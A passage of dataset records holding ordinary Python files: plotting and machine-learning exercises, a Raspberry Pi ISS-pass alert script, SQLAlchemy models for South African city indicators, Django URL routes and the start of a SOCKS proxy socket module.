plt\nfrom matplotlib import cm\nimport numpy as np\nfrom mpl_toolkits.mplot3d.axes3d import get_test_data\nfrom mpl_toolkits.mplot3d import Axes3D\n\n\nfig = plt.figure( figsize =plt.figaspect( 0.2 ))\nax1 = fig.add_subplot( 1 , 2 , 1 )\nX = np.arange(0 , 20 , 1 )\nY = np.arange(0, 20 , 1 )\nX1 = np.arange(0 ,5 , 1 )\nY2 = np.arange(-2, 3 , 1 )\n\nax1= plt.plot(X, Y**2, 'g^')\nax1=plt.xlabel('etykieta x')\nax1=plt.ylabel('etykieta y')\nax1=plt.title(\"Prosty wykres\")\nax2 = fig.add_subplot( 1 , 2 , 2 )\nax2=plt.plot (X1, abs(Y2*2), label= 'liniowy')\nax2=plt.plot (X1, abs(Y2*2), 'r+')\nax2=plt.xlabel('etykieta x')\nax2=plt.ylabel('etykieta y')\nax2=plt.title(\"Prosty wykres\")\nplt.show()\n","sub_path":"KOLOSzPandasNumpyMatplotLIb/MatPlotLib3d6.py","file_name":"MatPlotLib3d6.py","file_ext":"py","file_size_in_byte":699,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"145473924","text":"# Overhead is defined as 10 degrees in elevation for the observer.\n# The times are computed in UTC and the length of time that the ISS is above 10 degrees is in seconds.\n# Epoch time: https://www.epochconverter.com\n\nimport json, urllib.request, time, pigpio\nfrom gpiozero import LED\nfrom os import system\nfrom time import sleep\n\n#Define variable names for pinouts\n\n#LED\nLED_north = LED(5)\nLED_east = LED(6)\nLED_south = LED(13)\nLED_west = LED(12)\nLED_oneMin = LED(17)\nLED_fiveMin = LED(27)\nLED_tenMin = LED(22)\n\n# activate piGpio daemon before connecting to it below\nsystem(\"sudo pigpiod\")\n\n# Servo\npi = pigpio.pi()\n\nmyServo = 16\nmyServoUp = 530 # Servo duty time for flag raised\nmyServoDown = 1530 # Servo duty time for flag lowered\nflagUp = False\n\n# API\nmomLatitude = 43.577090\nmomLongitude = 
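To see the stad/graph.py helpers above end to end, here is a tiny run that mirrors create_mst on a three-point line graph; the distance matrix is made up for illustration:

```python
import numpy as np
from scipy.sparse.csgraph import minimum_spanning_tree

# Three points on a line: 0 -- 1 -- 2, with 0-2 the longest pair.
dist = np.array([[0., 1., 2.],
                 [1., 0., 1.],
                 [2., 1., 0.]], dtype='float32')

mst = minimum_spanning_tree(dist).toarray()
mst = np.where(mst > 0, 1, 0)           # unit weights, as in create_mst
mst = (mst + mst.T).astype('float32')   # symmetrize

print(mst)
# [[0. 1. 0.]
#  [1. 0. 1.]
#  [0. 1. 0.]]   -- the long 0-2 edge is excluded from the tree
```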
-79.727520\naltitude = 128\nurl = \"http://api.open-notify.org/iss-pass.json?lat={lat}&lon={long}&alt={a}\".format(lat=momLatitude, long=momLongitude, a=altitude)\nrefreshTime = 5 # How often we check API\n\n#Alerts\n# Compare minutes against time remaining for alerts\nalertOne = 10\nalertTwo = 5\nalertThree = 1\n\n# Triggers so we don't have the alert go over multiple times\nalertOneTriggered = False\nalertTwoTriggered = False\nalertThreeTriggered = False\n\nalerts = \"\"\n\n# (the pigpio daemon is started near the top of the script, before pigpio.pi() connects to it)\n\n#Alerts - put logic here\ndef AlertOne():\n print(\"Alert 1 triggered!\")\n LED_tenMin.on()\n print(\"Ten minute light is on\")\n \ndef AlertTwo():\n print(\"Alert 2 triggered!\")\n LED_tenMin.off()\n print(\"Ten minute light is off\")\n LED_fiveMin.on()\n print(\"Five minute light is on\")\n \ndef AlertThree(duration):\n global flagUp # without this, the assignment below would only set a local variable\n print(\"Alert 3 triggered!\")\n LED_fiveMin.off()\n LED_oneMin.on()\n print(\"One minute light is on\")\n pi.set_servo_pulsewidth(myServo, myServoUp) # flag raised\n sleep(1)\n pi.set_servo_pulsewidth(myServo, 0) # flag motor off\n sleep(1)\n flagUp = True\n print(\"flag is up\")\n sleep(duration)\n Reset()\n\n#reset everything back to default!\ndef Reset():\n global flagUp\n print(\"resetting\")\n LED_tenMin.off()\n LED_fiveMin.off()\n LED_oneMin.off()\n LED_north.off()\n LED_east.off()\n LED_south.off()\n LED_west.off()\n pi.set_servo_pulsewidth(myServo, myServoDown) # flag lowered\n sleep(1)\n pi.set_servo_pulsewidth(myServo, 0) # flag motor off\n sleep(1)\n flagUp = False\n \n# Check if an alert has been triggered against the remaining time in minutes\ndef CheckalertTimes(seconds, duration):\n minutes = seconds/60\n minutes = int(minutes)\n# minutes -= 510 # This is an offset for testing\n print(\"debug minutes: \" + str(minutes))\n global alertOneTriggered\n global alertTwoTriggered\n global alertThreeTriggered\n global alerts\n\n if minutes <= alertOne and minutes > alertTwo:\n if alertOneTriggered is False:\n alertOneTriggered = True\n alerts = \"Alerts: {one}m [X] {two}m [ ] {three}m [ ]\".format(one=alertOne, two=alertTwo, three=alertThree)\n AlertOne()\n elif minutes <= alertTwo and minutes > alertThree:\n if alertTwoTriggered is False:\n alertTwoTriggered = True\n alerts = \"Alerts: {one}m [X] {two}m [X] {three}m [ ]\".format(one=alertOne, two=alertTwo, three=alertThree)\n AlertTwo()\n elif minutes <= alertThree and minutes >= 0:\n if alertThreeTriggered is False:\n alertThreeTriggered = True\n alerts = \"Alerts: {one}m [X] {two}m [X] {three}m [X] \\nISS overhead is coming in \".format(one=alertOne, two=alertTwo, three=alertThree) + str(minutes*60) + \" seconds\"\n AlertThree(duration)\n else:\n alertOneTriggered = False\n alertTwoTriggered = False\n alertThreeTriggered = False\n alerts = \"Alerts: {one}m [ ] {two}m [ ] {three}m [ ]\".format(one=alertOne, two=alertTwo, three=alertThree)\n # print(\"ISS is \" + str(int(minutes)) + \" minutes away\")\n \n\"\"\"\n\n# Display progress on LCD(16) - Future feature\ndef ShowLCD(tLeft, dur):\n value = int(tLeft / 60) # convert time to minutes\n value -= 159 # Use this to create an offset in minutes to test the data (if 20 mins are left, value -= 4 = 16 mins left)\n if 16 >= value: # if each character on the LCD is 1, if there is less than 16 minutes left, show updates\n LCDDisplay = \"================\" # number of characters match LCD\n invertValue = 16 - value\n LCDDisplay = LCDDisplay[:invertValue] + \"0\" + LCDDisplay[invertValue+1:]\n print (str(LCDDisplay))\n\n if value == 0: # if it's less than 1 
minute, display message\n LCDDisplay = \"Overhead {secs} Sec\".format(secs=dur)\n print (str(LCDDisplay))\n\n\"\"\"\n\ndef Error(e):\n #Define error behaviour, for example you can add a network indicator LED, etc.\n print(\"ERROR: \" + e)\n\nwhile True:\n\n try:\n #Get JSON data\n req = urllib.request.urlopen(url)\n resp = json.loads(req.read())\n\n # Matches the 'iss-pass.json' json structure\n request = resp[\"request\"] # the 'request' block echoes back the query parameters we sent\n latitude = request[\"latitude\"]\n longitude = request[\"longitude\"]\n altitude = request[\"altitude\"]\n datetime = request[\"datetime\"] # generated time, not current - helps if we can't get current time on a device\n \n # Get first overhead response\n response = resp[\"response\"]\n # we're only grabbing the first index ('0') because we only need to see the next upcoming pass\n duration = response[0][\"duration\"] \n risetime = response[0][\"risetime\"]\n\n # Get current time (epoch time)\n currentTime = int(time.time())\n timeLeft = risetime - currentTime\n\n # Check the remaining minutes against the alert times\n CheckalertTimes(timeLeft, duration)\n\n # Formatted output to view\n print(\"\")\n print(\"=========[ Overhead ISS Pass ]==========\")\n print(time.strftime(\"Next: %Y-%m-%d %I:%M:%S %p\", time.localtime(risetime)))\n print(\"Duration: \" + str(duration) + \" seconds\")\n print(\"Time Left: \" + str(int(timeLeft/60)) + \" minutes\")\n print(alerts)\n print(\"========================================\")\n # ShowLCD(timeLeft, duration)\n except urllib.error.URLError as ex:\n Error(str(ex.reason))\n \n time.sleep(refreshTime) \n\n\"\"\"\nGPIO.cleanup() # need this somewhere?\n\"\"\"\n","sub_path":"PieSS_v01.py","file_name":"PieSS_v01.py","file_ext":"py","file_size_in_byte":5972,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"455541871","text":"# 2021-04-14, lucas.mayer.almeida@ccc.ufcg.edu.br\n# The function moves the values smaller than the mean to the first positions\n# of the list, followed by the values greater than the mean\n\ndef organiza_por_media(nums) :\n total = 0\n for i in nums :\n total += i\n if len(nums) == 0:\n return nums\n media = total / len(nums)\n for i in range(len(nums)) :\n j = i\n while j > 0 and nums[j] <= media and nums[j-1] > media :\n nums[j], nums[j-1] = nums[j-1], nums[j]\n j -= 1\n return nums\n","sub_path":"atividades/organiza_lista_pela_media/questao.py","file_name":"questao.py","file_ext":"py","file_size_in_byte":533,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"626087428","text":"import numpy as np\n\n\ndef step_function(y_prim, negative_class=-1):\n if y_prim > 0:\n return 1\n\n return negative_class\n\n\ndef compute_weight_update(x, y, weights, negative_class=-1):\n y_pred = step_function(np.matmul(weights.T, x), negative_class)\n if y == y_pred:\n return np.zeros(x.shape[0])\n\n return y * x\n\n\ndef perceptron_learning(X, labels, lr=0.001, max_iters=100, seed=42, w_init=None, negative_class=-1):\n # add bias\n X = np.c_[X, np.ones(X.shape[0])]\n dim_num = X.shape[1]\n print(X.shape)\n it_num = 0\n weights = np.random.default_rng(seed).normal(0, 0.5, dim_num) if w_init is None else w_init\n weight_history = list()\n weight_update = np.ones((1, dim_num))\n while np.any(weight_update != 0):\n weight_history.append(weights.copy())\n weight_update = np.sum(\n list(\n map(\n lambda x, y: compute_weight_update(x, y, weights=weights, negative_class=negative_class), X, 
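CheckalertTimes in PieSS_v01.py mixes threshold logic with LED and servo side effects. Pulling the thresholds into a pure function makes them testable without hardware; the defaults below mirror alertOne/alertTwo/alertThree, a sketch:

```python
def alert_stage(minutes_left, one=10, two=5, three=1):
    """Pure version of the CheckalertTimes thresholds: returns 1, 2, 3 or None."""
    if two < minutes_left <= one:
        return 1
    if three < minutes_left <= two:
        return 2
    if 0 <= minutes_left <= three:
        return 3
    return None  # outside every alert window: reset the triggers

assert alert_stage(9) == 1
assert alert_stage(3) == 2
assert alert_stage(0) == 3
assert alert_stage(42) is None
```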
labels)),\n axis=0)\n weights += lr*weight_update\n it_num += 1\n\n if it_num >= max_iters:\n print('Warning: reached maximum number of iterations.')\n break\n\n print(f'Number of epochs: {it_num}')\n return weights, weight_history\n\n\ndef perc_predict(X, weights):\n # add bias\n X = np.c_[X, np.ones(X.shape[0])]\n # predict\n y_pred = X @ weights\n # threshold\n y_pred[y_pred > 0] = 1\n y_pred[y_pred <= 0] = -1\n return y_pred\n","sub_path":"lab1/part1/algorithms/perceptron.py","file_name":"perceptron.py","file_ext":"py","file_size_in_byte":1506,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"596600049","text":"from ..app import db\nfrom ..forms import Form\nfrom wtforms import StringField, validators, SelectField, SelectMultipleField, IntegerField\nfrom sqlalchemy import func\nfrom sqlalchemy.orm import relationship\nfrom wtforms.widgets import TextArea, HiddenInput\n\nfrom sqlalchemy import (\n Column,\n Date,\n Float,\n ForeignKey,\n Integer,\n String,\n Text,\n func,\n Boolean,\n event,\n)\n\n\nclass DataPoint(db.Model):\n \"\"\"\n A single data point (yearly value) of an indicator\n \"\"\"\n __tablename__ = 'datapoints'\n\n id = Column(Integer, autoincrement=True, primary_key=True)\n dataset_id = Column(Integer, ForeignKey('datasets.id'), index=True, nullable=False)\n indicator_id = Column(Integer, ForeignKey('indicators.id'), index=True, nullable=False)\n region_id = Column(Integer, ForeignKey('regions.id'), index=True, nullable=False)\n type_id = Column(Integer, ForeignKey('types.id'), index=True, nullable=False)\n theme_id = Column(Integer, ForeignKey('themes.id'), index=True, nullable=False)\n value = Column(Float, unique=False, nullable=False)\n year = Column(Integer, index=True, unique=False, nullable=False)\n\n # Associations\n dataset = relationship(\"DataSet\", backref='dataset')\n indicator = relationship(\"Indicator\")\n region = relationship(\"Region\", backref='region')\n type = relationship(\"Type\")\n theme = relationship(\"Theme\")\n\n def __repr__(self):\n return '<DataPoint {}>'.format(self.id)\n\n\nclass DataSet(db.Model):\n \"\"\"\n The dataset a data point belongs to\n \"\"\"\n __tablename__ = \"datasets\"\n\n id = Column(Integer, primary_key=True)\n ds_name = Column(String(80), index=True, nullable=False, unique=True)\n\n def __repr__(self):\n return \"<DataSet %r>\" % (self.ds_name)\n\n @classmethod\n def create_defaults(cls):\n text = \"\"\"\n Population size\n Population density\n Households\n Population growth rate\n Female population\n Male population\n Sex ratio\n Dependency ratio\n Child population\n Youth population\n Adult population\n Elderly population\n Net migration rate\n International immigrants rate\n Indigent\n Poverty rate\n Gini Coefficient\n Life expectancy - Male\n Life expectancy - Female\n Gross Value Add\n Exports\n Imports\n Household income\n Cost of living\n Economically active population\n Employment Absorption Rate\n Employment\n Unemployment Rate\n Vulnerable population unemployment\n Human Development Index\n Fixed-landline connections per 100,000\n Mobile connections per 100,000\n Internet connections per 100,000\n Water availability\n Water consumption\n Non-revenue water\n Water losses\n Risk Score - blue drop\n Risk score - green drop\n Energy supply - Petrol\n Energy supply - Diesel\n Energy supply - Coal\n Energy supply - Paraffin\n Energy supply - LPG\n Energy supply - HFO\n Energy supply - JetFuel + AvGas\n Energy consumption (GJ)\n Energy intensity - Residential\n Energy intensity - 
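A tiny usage sketch for the perceptron above, assuming perceptron_learning and perc_predict are importable; the four data points are made up and linearly separable, so the update term reaches zero and the loop converges:

```python
import numpy as np

# Four separable points in 2-D; labels must be +1 / -1 for this learner.
X = np.array([[2.0, 2.0], [3.0, 3.0], [-2.0, -2.0], [-3.0, -1.0]])
labels = np.array([1, 1, -1, -1])

weights, history = perceptron_learning(X, labels, lr=0.1, max_iters=1000)
preds = perc_predict(X, weights)
print(preds)         # expected: [ 1.  1. -1. -1.]
print(len(history))  # number of epochs actually run
```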
Commercial\n Energy intensity - Industrial\n Energy intensity - Transport\n Energy intensity - Government\n Energy intensity - Agriculture\n Renewable energy\n Energy losses\n Green house gas emissions\n Waste recycling (tonnes)\n Residential fuel combustion - heating - coal\n Residential fuel combustion - heating - wood\n Residential fuel combustion - cooking - coal\n Residential fuel combustion - cooking - wood\n Open Space\n Energy use - Residential\n Energy use - Commercial\n Energy use - Industrial\n Energy use - Transport\n Energy use - Government\n Energy use - Agriculture\n Energy use - Losses\n Emissions - Residential\n Emissions - Commercial\n Emissions - Industrial\n Emissions - Transport\n Emissions - Government\n Emissions - Agriculture\n Emissions - Losses\n Emissions - All fuels excl aviation and marine\n Male learner enrolment- primary\n Female learner enrolment- primary\n Male learner enrolment- secondary\n Female learner enrolment- secondary\n Learner-educator ratio\n Completion rate - primary school 2011\n Completion rate - secondary school 2011\n Literacy rates\n Matric pass rate\n Hospital beds - public sector\n Mortality - under 5 years per 1000\n Multiple deprivation index\n Dwelling type - formal\n Dwelling type - informal\n Dwelling type - traditional\n Dwelling tenure - owned + paid\n Dwelling tenure - owned + not paid\n Dwelling tenure - rented\n Dwelling tenure - occupied + no rent\n Informal shelter growth\n Housing Affordability Ratio\n Housing Affordability Index\n Transport passengers - Train\n Transport passengers - Bus\n Transport passengers - Taxi\n Transport passengers - Car / Truck driver\n Transport passengers - Car / Truck passenger\n Transport passengers - Walk only\n Transport passengers - Other\n Motor vehicle ownership\n Inpatient bed utilisation rate\n Educational level - no schooling\n Educational level - some primary\n Educational level - completed primary\n Educational level - some secondary\n Educational level - grade 12 / std 9\n Educational level - higher education\n Educational level - other\n Educational level - total\n Municipal management vacancies\n Municipal posts - Community and Social Services\n Municipal posts - Finance and Administration\n Municipal posts - Electricity\n Municipal posts - Environmental Protection\n Municipal posts - Health\n Municipal posts - Public Safety\n Municipal posts - Road Transport\n Municipal posts - Sport and Recreation\n Municipal posts - Waste Management\n Municipal posts - Waste Water Management\n Municipal posts - Water\n Municipal posts - Other\n Municipal staff vacancies\n Voter turnout - Local\n Voter Turnout - National\n Access to water - Piped in dwelling\n Access to water - Piped in yard\n Access to water - Communal within 200m\n Access to water - Communal more than 200m\n Access to water - No piped\n Access to sanitation - Flush toilet\n Access to sanitation - VIPs\n Access to sanitation - Pit toilet\n Access to sanitation - Bucket System\n Access to sanitation - No toilet\n Access to electricity - Lighting only\n Access to electricity - Lighting and other\n Access to electricity - Not using\n Access to refuse removal - Weekly by authority\n Access to refuse removal - Less than weekly by authority\n Access to refuse removal - Community removal\n Access to refuse removal - Personally removed\n Access to refuse removal - No removal\n Clinics - provincial\n External audit\n Informal settlements\n Residential rates\n Business rates\n Services levy\n Grants\n Capital grants & transfers\n Operating 
surplus\n Debtors\n Bad Debt\n Remuneration costs\n Liabilities\n Cash position\n Acid test ratio\n Debt to income ratio\n Current ratio\n Debt ratio\n Budget funding\n Wasteful expenditure\n Operating expenditure - Employee related\n Operating expenditure - Remuneration of councillors\n Operating expenditure - Bad debt\n Operating expenditure - Repairs and maintenance\n Operating expenditure - Bulk purchase\n Operating expenditure - Other operating\n Operating expenditure - Total\n Operating expenditure - Ave annual growth\n Operating expenditure - Repairs and maintenance growth\n Affordability of municipal bills - Municipal Bill\n Affordability of municipal bills - Benchmark income\n Affordability of municipal bills - Municipal bill as percent of income\n Affordability of municipal bills - change since 2010\n Voter turnout- local\n Voter registration - local\n \"\"\"\n\n dataset = []\n for s in text.strip().split(\"\\n\"):\n i = DataSet()\n i.ds_name = s.strip()\n dataset.append(i)\n\n return dataset\n\n @classmethod\n def all(cls):\n return cls.query.order_by(DataSet.ds_name).all()\n\n\nclass Indicator(db.Model):\n \"\"\"\n The indicator a data point can belong to\n \"\"\"\n __tablename__ = \"indicators\"\n\n id = Column(Integer, primary_key=True)\n in_name = Column(String(80), nullable=False, unique=True)\n unit = Column(String(80), nullable=True, unique=False)\n definition = Column(String(400), nullable=True, unique=False)\n theme = Column(String(80), nullable=True, unique=False)\n sub_theme = Column(String(80), nullable=True, unique=False)\n source = Column(String(500), nullable=True, unique=False)\n frequency = Column(String(80), nullable=True, unique=False)\n\n def __repr__(self):\n return \"<Indicator %r>\" % (self.in_name)\n\n @classmethod\n def create_defaults(cls):\n text = \"\"\"\n Population size\n Population density\n Households\n Population growth rate\n Female population\n Male population\n Sex ratio\n Dependency ratio\n Child population\n Youth population\n Adult population\n Elderly population\n Net migration rate\n International immigrants rate\n Indigent\n Poverty rate\n Gini Coefficient\n Life expectancy\n Gross Value Add\n Exports\n Imports\n Household income\n Cost of living\n Economically active population\n Employment Absorption Rate\n Employment\n Unemployment Rate\n Vulnerable population unemployment\n Human Development Index\n Fixed-landline connections per 100,000\n Mobile connections per 100,000\n Internet connections per 100,000\n Water availability\n Water consumption\n Non-revenue water\n Water losses\n Risk Score - blue drop\n Risk score - green drop\n Energy supply\n Energy consumption (GJ)\n Energy intensity\n Renewable energy\n Energy losses\n Green house gas emissions\n Waste recycling (tonnes)\n Residential fuel combustion\n Open Space\n Energy use\n Emissions\n Learner enrolment - primary\n Learner enrolment - secondary\n Learner-educator ratio\n Completion rate - primary school\n Completion rate - secondary school\n Literacy rates\n Matric pass rate\n Hospital beds - (public sector)\n Mortality - under 5 years per 1000\n Multiple deprivation index\n Dwelling type\n Dwelling tenure\n Informal shelter growth\n Housing Affordability Ratio\n Housing Affordability Index\n Transport passengers\n Motor vehicle ownership\n Inpatient bed utilisation rate\n Educational level\n Municipal management vacancies\n Municipal posts\n Municipal staff vacancies\n Voter turnout - Local\n Voter Turnout - National\n Access to water\n Access to sanitation\n Access to electricity\n 
Access to refuse removal\n Clinics - provincial\n External audit\n Informal settlements\n Residential rates\n Business rates\n Services levy\n Grants\n Capital grants & transfers\n Operating surplus\n Debtors\n Bad Debt\n Remuneration costs\n Liabilities\n Cash position\n Acid test ratio\n Debt to income ratio\n Current ratio\n Debt ratio\n Budget funding\n Wasteful expenditure\n Operating expenditure\n Affordability of municipal bills\n Voter turnout- local\n Voter registration - local\n \"\"\"\n\n indicator = []\n for s in text.strip().split(\"\\n\"):\n i = Indicator()\n i.in_name = s.strip()\n indicator.append(i)\n\n return indicator\n\n @classmethod\n def all(cls):\n return cls.query.order_by(Indicator.in_name).all()\n\n\nclass Region(db.Model):\n \"\"\"\n The geographic region the data point belongs to\n \"\"\"\n __tablename__ = \"regions\"\n\n id = Column(Integer, primary_key=True)\n re_name = Column(String(50), index=True, nullable=False, unique=True)\n\n def __repr__(self):\n return \"<Region %r>\" % (self.re_name)\n\n @classmethod\n def create_defaults(cls):\n text = \"\"\"\n Johannesburg\n Tshwane\n Cape Town\n EThekwini\n Ekurhuleni\n Nelson Mandela Bay\n Buffalo City\n Mangaung\n Msunduzi\n Western Cape\n Eastern Cape\n Northern Cape\n Free State\n KwaZulu-Natal\n North West\n Gauteng\n Mpumalanga\n Limpopo\n National\n \"\"\"\n\n region = []\n for s in text.strip().split(\"\\n\"):\n i = Region()\n i.re_name = s.strip()\n region.append(i)\n\n return region\n\n @classmethod\n def all(cls):\n return cls.query.order_by(Region.re_name).all()\n\n\nclass WaziRegion(db.Model):\n \"\"\"\n A region's Wazimap identifiers (slug and abbreviation)\n \"\"\"\n __tablename__ = \"wazi_regions\"\n\n id = Column(Integer, primary_key=True)\n re_name = Column(String(50), index=True, nullable=False, unique=True)\n wazi_name = Column(String(50), index=True, nullable=False, unique=True)\n wazi_abr = Column(String(10), index=True, nullable=False, unique=True)\n\n def __repr__(self):\n return \"<WaziRegion %r>\" % (self.re_name)\n\n @classmethod\n def create_defaults(cls):\n\n wazi_regions = {1: {'name': 'Johannesburg', 'wazi_name': 'city-of-johannesburg', 'abbreviation': 'JHB'},\n 2: {'name': 'Tshwane', 'wazi_name': 'city-of-tshwane', 'abbreviation': 'TSH'},\n 3: {'name': 'Cape Town', 'wazi_name': 'city-of-cape-town', 'abbreviation': 'CPT'},\n 4: {'name': 'EThekwini', 'wazi_name': 'ethekwini', 'abbreviation': 'ETH'},\n 5: {'name': 'Ekurhuleni', 'wazi_name': 'ekurhuleni', 'abbreviation': 'EKU'},\n 6: {'name': 'Nelson Mandela Bay', 'wazi_name': 'nelson-mandela-bay', 'abbreviation': 'NMA'},\n 7: {'name': 'Buffalo City', 'wazi_name': 'buffalo-city', 'abbreviation': 'BUF'},\n 8: {'name': 'Mangaung', 'wazi_name': 'mangaung', 'abbreviation': 'MAN'},\n 9: {'name': 'Msunduzi', 'wazi_name': 'the-msunduzi', 'abbreviation': 'KZN225'}\n }\n\n waziregion = []\n for i in range(1, 10):\n r = WaziRegion()\n r.re_name = wazi_regions[i]['name']\n r.wazi_name = wazi_regions[i]['wazi_name']\n r.wazi_abr = wazi_regions[i]['abbreviation']\n waziregion.append(r)\n\n return waziregion\n\n @classmethod\n def all(cls):\n return cls.query.order_by(WaziRegion.id).all()\n\n\nclass Type(db.Model):\n \"\"\"\n The geographic data type\n \"\"\"\n __tablename__ = \"types\"\n\n id = Column(Integer, primary_key=True)\n ty_name = Column(String(50), index=True, nullable=False, unique=True)\n\n def __repr__(self):\n return \"<Type %r>\" % (self.ty_name)\n\n @classmethod\n def create_defaults(cls):\n text = \"\"\"\n City\n Province\n National\n \"\"\"\n\n types = []\n for s in 
text.strip().split(\"\\n\"):\n i = Type()\n i.ty_name = s.strip()\n types.append(i)\n\n return types\n\n @classmethod\n def all(cls):\n return cls.query.order_by(Type.ty_name).all()\n\n\nclass Theme(db.Model):\n \"\"\"\n The theme a data point belongs to\n \"\"\"\n __tablename__ = \"themes\"\n\n id = Column(Integer, primary_key=True)\n th_name = Column(String(50), index=True, nullable=False, unique=True)\n\n def __repr__(self):\n return \"<Theme %r>\" % (self.th_name)\n\n @classmethod\n def create_defaults(cls):\n text = \"\"\"\n Demographics\n Productive\n Sustainable\n Inclusive\n Well-governed\n \"\"\"\n\n theme = []\n for s in text.strip().split(\"\\n\"):\n i = Theme()\n i.th_name = s.strip()\n theme.append(i)\n\n return theme\n\n @classmethod\n def all(cls):\n return cls.query.order_by(Theme.th_name).all()\n\n\nclass ExploreForm(Form):\n\n dataset_id = SelectField('Dataset', [validators.Optional()])\n indicator_id = SelectField('Indicator', [validators.DataRequired()])\n region_id = SelectField('Region', [validators.Optional()])\n type_id = SelectField('Region Type', [validators.Optional()])\n theme_id = SelectField('Indicator Theme', [validators.Optional()])\n year = SelectField('Year', [validators.Optional()])\n explore_submitted = IntegerField('Submitted', default=0, widget=HiddenInput())\n\n def __init__(self, *args, **kwargs):\n super(ExploreForm, self).__init__(*args, **kwargs)\n remove_list = ['Poverty rate', 'Gini Coefficient', 'Gross Value Add', 'Exports', 'Multiple deprivation index',\n 'Human Development Index']\n self.dataset_id.choices = [[str(c.id), c.ds_name] for c in DataSet.all() if c.ds_name not in remove_list]\n self.dataset_id.choices.insert(0, ('', 'Empty'))\n self.indicator_id.choices = [[str(c.id), c.in_name] for c in Indicator.all() if c.in_name not in remove_list]\n self.indicator_id.choices.insert(0, ['', 'Empty'])\n self.region_id.choices = [[str(c.id), c.re_name] for c in Region.all()]\n self.region_id.choices.insert(0, ('', 'Empty'))\n self.type_id.choices = [[str(c.id), c.ty_name] for c in Type.all()]\n self.type_id.choices.insert(0, ('', 'Empty'))\n self.theme_id.choices = [[str(c.id), c.th_name] for c in Theme.all()]\n self.theme_id.choices.insert(0, ('', 'Empty'))\n self.year.choices = [[str(i), str(y)] for i, y in enumerate(range(1996, 2018))]\n self.year.choices.insert(0, ('', 'Empty'))\n\n def validate(self):\n return super(ExploreForm, self).validate()\n\n def populate_obj(self, obj):\n super(ExploreForm, self).populate_obj(obj)\n\n","sub_path":"scoda/models/datasets.py","file_name":"datasets.py","file_ext":"py","file_size_in_byte":18784,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"251090572","text":"from django.conf.urls import patterns, url\n\nfrom app.views import views as main\nfrom app.views import oauth\n\nurlpatterns = patterns('',\n url(r'^login/$', oauth.login, name='login'),\n url(r'^auth_url_redirect/$', oauth.auth_url_redirect, name='auth_url_redirect'),\n\n url(r'^$', main.index, name='index'),\n url(r'^home/$', main.home, name='home'),\n\n url(r'^(?P<category>\\w+)/hot/$', main.hot, name='hot'),\n url(r'^(?P<category>\\w+)/next/$', main.next_page, name='next_page'),\n\n url(r'^funny/(?P<eid>\\d+|\\w+)/comments/$', main.fetch_comments, name='fetch_comments'),\n )\n","sub_path":"app/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":751,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"405177955","text":"# -*- coding: UTF-8 -*- \r\n#!/usr/bin/env 
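The create_defaults classmethods in scoda/models/datasets.py build unsaved model instances. A minimal seeding sketch, assuming a Flask application context and the Flask-SQLAlchemy db object this module imports:

```python
# A sketch of seeding the lookup tables; run inside an app context.
def seed_defaults(db):
    for model in (DataSet, Indicator, Region, WaziRegion, Type, Theme):
        rows = model.create_defaults()
        db.session.add_all(rows)   # instances are built but not yet persisted
    db.session.commit()
```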
python\r\n# \r\n#SocksiPy - Python SOCKS module.\r\n#Version 1.00\r\n#\r\n#Copyright 2006 Dan-Haim. All rights reserved.\r\n#\r\n#Redistribution and use in source and binary forms, with or without modification,\r\n#are permitted provided that the following conditions are met:\r\n#1. Redistributions of source code must retain the above copyright notice, this\r\n# list of conditions and the following disclaimer.\r\n#2. Redistributions in binary form must reproduce the above copyright notice,\r\n# this list of conditions and the following disclaimer in the documentation\r\n# and/or other materials provided with the distribution.\r\n#3. Neither the name of Dan Haim nor the names of his contributors may be used\r\n# to endorse or promote products derived from this software without specific\r\n# prior written permission.\r\n# \r\n#THIS SOFTWARE IS PROVIDED BY DAN HAIM \"AS IS\" AND ANY EXPRESS OR IMPLIED\r\n#WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF\r\n#MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO\r\n#EVENT SHALL DAN HAIM OR HIS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,\r\n#INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT\r\n#LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA\r\n#OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF\r\n#LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT\r\n#OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMANGE.\r\n#\r\n# Copyright 2010- Hui Zhang\r\n# E-mail: hui.zh012@gmail.com\r\n#\r\n# Distributed under the terms of the GPL (GNU Public License)\r\n\r\n__all__ = ['Sock', 'SockStatus', 'SockProxy', 'ProxyError',\r\n ]\r\n\r\nimport struct\r\nfrom collections import namedtuple\r\nfrom base64 import b64encode\r\nfrom urllib import unquote\r\nfrom socket import socket, gethostbyname, inet_aton, inet_ntoa, error, SOL_SOCKET, SO_ACCEPTCONN\r\nimport errno\r\n\r\nfrom .attribute import attribute\r\nfrom .dispatcher import xyobj\r\n\r\nSockProxy = namedtuple('SockProxy', 'type host port user password rdns')\r\nclass ProxyError(Exception): pass\r\nclass SockStatus:\r\n CLOSED, CREATED, CONNECTED, BOUND, ACCEPTING, UNKNOWN = range(6)\r\n\r\nclass Sock(xyobj):\r\n ## should be set before serve\r\n so_family = 2\r\n so_type = 1\r\n so_proto = 0\r\n so_blocking = 1\r\n so_timeout = None\r\n \r\n so_proxy = None\r\n so_proxy_sock = None\r\n so_proxy_peer = None\r\n\r\n ## the real socket object\r\n @attribute\r\n def so_socket(self):\r\n s = socket(self.so_family, self.so_type, self.so_proto)\r\n s.settimeout(self.so_timeout)\r\n self.so_proxy_sock = None\r\n self.so_proxy_peer = None\r\n return s\r\n \r\n 